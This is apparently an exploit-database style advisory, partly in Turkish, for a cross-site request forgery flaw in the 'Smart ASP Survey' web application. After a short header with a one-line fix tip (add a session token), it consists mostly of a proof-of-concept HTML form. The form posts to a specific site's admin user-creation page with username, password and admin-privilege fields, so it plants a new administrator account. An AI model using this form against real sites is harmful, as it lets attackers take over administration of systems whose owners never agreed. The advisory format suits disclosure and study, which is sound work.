< ------------------- header data start ------------------- >

#############################################################

# Application Name : Smart ASP Survey

# vulnerable Type : XSRF

# Infection : Admin ve user eklenebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmelidir !

# author : Trk_komando

< ------------------- header data end of ------------------- >

< -- bug code start -- >
<form action=http://preproject.com/poll/admin/adminusers.asp?stage=new method=post>
<input type=text value= name=username size=15>
</td>

<td align=center valign=center width=128><font face=Verdana,Helvetica size=-1>
<input type=text value= name=fullname size=15>
</td>

<td align=center valign=center width=129><font face=Verdana,Helvetica size=-1>

<input type=password value= name=password1 size=15>
</td>

<td align=center valign=center width=123><font face=Verdana,Helvetica size=-1>
<input type=password value= name=password2 size=15>
</td>

<td align=center valign=center width=59><font face=Verdana,Helvetica size=-1>
<input type=checkbox name=privedit value=ON>
</td>

<td align=center valign=center width=47>
<input type=image src= ../images/save.gif border=0 alt=Save>
</td>

<td width=14></form>

< -- bug code end of -- >